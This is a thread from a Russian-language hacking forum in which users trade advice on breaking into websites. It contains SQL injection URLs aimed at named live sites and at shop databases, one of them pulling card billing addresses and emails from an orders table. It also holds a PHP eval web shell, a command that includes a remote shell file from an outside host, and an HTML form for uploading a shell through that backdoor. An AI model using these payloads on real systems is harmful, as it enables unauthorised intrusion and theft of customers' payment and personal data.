Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    http://fitnesslife.com.ua/index.php?id=7647&show=4nalbum&do=showgall&gid=13078+union+select+1,2,3,4,@@version,6,7,8,9--+

    Скобки не используй и крути
     
    1 person likes this.
  2. daniel_1024

    daniel_1024 Elder - Старейшина

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    скажите как залить полноценный шелл на сервер имея на нем пхп с этим кодом:
    PHP:
    <?php eval($_GET["cmd"]); ?>
    какой запрос надо составить?
     
  3. wildshaman

    wildshaman Elder - Старейшина

    Joined:
    16 Apr 2008
    Messages:
    477
    Likes Received:
    483
    Reputations:
    99
    Заливаешь свой шелл в формате .txt куда угодно, затем выполняешь
    script.php?cmd=include("http://yoursite.com/shell.txt");
    Затем через шелл льешь его в нужную папку на целевой сайт.
     
    1 person likes this.
  4. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Создаешь у себя на компе файл lypapam.html
    PHP:
     <form enctype=multipart/form-data method=post action="http://lala/shell.php?cmd=$f=$_FILES[x];copy($f[tmp_name],$f[name]);"><input type=file name=x><input type=submit></form
    ссылку до переменной http://lala/shell.php?cmd= - редактируешь под себя
    открываешь браузером lypapam.html, прикрепляешь шелл и клик на "отправить")
    шелл с таким же именем появится в папке с shell.php
     
    2 people like this.
  5. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    ребят, подскажите пожалуйста..
    тут копался и в одном сайте при переходе с одного страницы на другую - выдал ошибку:
    Code:
    Warning: include(../news.php) [function.include]: failed to open stream: No such file or directory in C:\Plesk\VHOSTS\[B]site.com[/B]\httpdocs\biography\index.php on line 107
    как я понял - раскрытье путей..
    как можно "эксплуатировать" эту ошибку ?
     
  6. Bb0y

    Bb0y Active Member

    Joined:
    30 Oct 2009
    Messages:
    116
    Likes Received:
    136
    Reputations:
    78
    Линк плз в студию.
    Либо инклюд, либо раскрытие из-за отсутствия инклюдируемого файла
     
  7. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    :D линк могу в личку кинуть, но хочется сам что то делать и понять.. сколько буду тут своими вопросами надоедать )))
     
    2 people like this.
  8. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,181
    Likes Received:
    618
    Reputations:
    690
    можно реализовать include ...
     
    _________________________
  9. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    shell_c0de
    Strilo4ka


    эта ошибка как бы в нижнем части появлается, в колонке вроде новостей.. мне кажется недоделанный скрипт. Вот даже когда захожу в титульную страницу - опять там эта ошибка :)
    вот так выглядет общий вид:
    Code:
    Warning: include(news.php) [function.include]: failed to open stream: No such file or directory in C:\Plesk\VHOSTS\site.com\httpdocs\index.php on line 107
    
    Warning: include() [function.include]: Failed opening 'news.php' for inclusion (include_path='.;./includes;./pear') in C:\Plesk\VHOSTS\site.com\httpdocs\index.php on line 107
    И как составить LFI ?
     
  10. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91
    Что за бред? Если в качестве пользовательских параметров не передаются данные, используемые для инклуда, это не уязвимость, а лишь раскрытие путей.
     
    1 person likes this.
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Не смотрев на этот сайт, я могу сказать, что эта ошибка возникает потому, что файла news.php нету. И это всего лишь раскрытие... Так что не надо тут выдумывать, что это инклуд. И рассказывать о том, что ты знаешь о фильтрах, еще и MQ совать сюда. И еще, скажи - причем здесь /etc/shadow и /etc/passwd? Ты бы еще про мороженое тут написал. Этого не надо! Человек задал конкретный вопрос, если знаешь конкретный ответ - отвечай, нет - пройди мимо. Еще раз говорю, НЕ НАДО писать здесь о том, что ты знаешь, и строить из себя "умного".

    PS:
    Отличный ответ.
     
    2 people like this.
  12. 3blK0B

    3blK0B Member

    Joined:
    28 Sep 2009
    Messages:
    8
    Likes Received:
    8
    Reputations:
    9
    Ошибка при получении данных из таблицы Order

    http://site.com/cart.asp?cartItemQuantity6=0&cartItemId=76'+or+1=(select+top+1+orderCardBillAddress1+from+Order)--

    При попытке получить данные их таблицы Order выдает ошибку:
    Microsoft OLE DB Provider for SQL Server error '80040e14'
    Incorrect syntax near the keyword 'Order'.
    /cart.asp, line 352

    я так понимаю проблема в том что SQL воспринимает название таблицы как "order by", так как данные из таблиц с другим названием получаются без проблем. Как представить название таблицы Order чтобы ее SQL принял как имя таблицы? Пробовал переводить в HEX, но это не помогло. Заранее спасибо за помощь!
     
  13. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    mailbrush
    :D А я думал все сторонники стеба и флуда. спасибо за понимание. таких людей побольше бы в ачате!

    Strilo4ka

    Мэн, не в обуду, но я не шаря в этом деле - могу сказать, что тут /etc/shadow и /etc/passwd вообше не причем, т.к. из путей видно, что сервер на WINDOWS. По этому речь о /etc/ идти не может.

    -------------

    И как я понял - это НЕ уязвимость, а просто недоделка веб мастера. Сайт чуть ли не умерший. наверно туда очень редко заходят. сайт персональный (певец). Америкосы делали :)
    Вопрос пока в силе - можно ли (и каким образом) пользоватся этим ?
    Если логично дуать, то там стоит MSSQL :) хотя.. может и нет..
     
  14. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    B1t.exe, кроме как раскрытие путей ты не чего не поимешь, т.к. там тупа нет подключаемого файла news.php
    Там типа вот этого
    PHP:
    <?php
    include "news.php";
    ?>
    а не
    PHP:
    <?php
    include $_GET[page];
    ?>
    т.е. на запрос повлиять нельзя.
    3blK0B, читай http://forum.antichat.ru/thread30501.html
     
    #11514 SeNaP, 22 Feb 2010
    Last edited: 22 Feb 2010
  15. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    SeNaP
    хмм. так и понял, что это не уязвимость :)
    вот пробую такие комбинации:
    Code:
    http://www.site.com/index.php? it=1' or 1=(select db_name())--
    http://www.site.com/index.php?it=1'
    http://www.site.com/index.php?it=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)--
    все вкидывают на главную страницу и никаких ошибок.
    может там не MSSQL ? или все же хорошо защищен от иньекции ?
     
  16. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20

    на

    http://www.site.com/index.php? it=1'
    or
    http://www.site.com/index.php? it=-1'
    что выдаёт?
     
  17. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    from [order], from "order"
     
  18. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Если доступа к information_schema нету, выход - брут (перебор) столбцов. Вряд ли за тебя кто-то это сделает.

    Даже, если бы это была unix-подобная система, /etc/shadow не прочтешь, даже если юзер = root.
     
    #11518 mailbrush, 22 Feb 2010
    Last edited: 22 Feb 2010
  19. B1t.exe

    B1t.exe Elder - Старейшина

    Joined:
    6 Nov 2006
    Messages:
    1,020
    Likes Received:
    128
    Reputations:
    23
    ноль реакции :( кидает на галвную (ссылка не меняется)
     
  20. Darren

    Darren Banned

    Joined:
    14 Jun 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    6
    Почему может выходить такая ошибка когда я пытаюсь вывести данные
    запрос типа:
    http://xxx/latest.asp?ID=&offset=&prod_id=8896%20union+select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,email%20from%20orders%20--

    ADODB.Command error '800a0d5d'
    Application uses a value of the wrong type for the current operation.
    /ProdDetail1.asp, line 20
     
Thread Status:
Not open for further replies.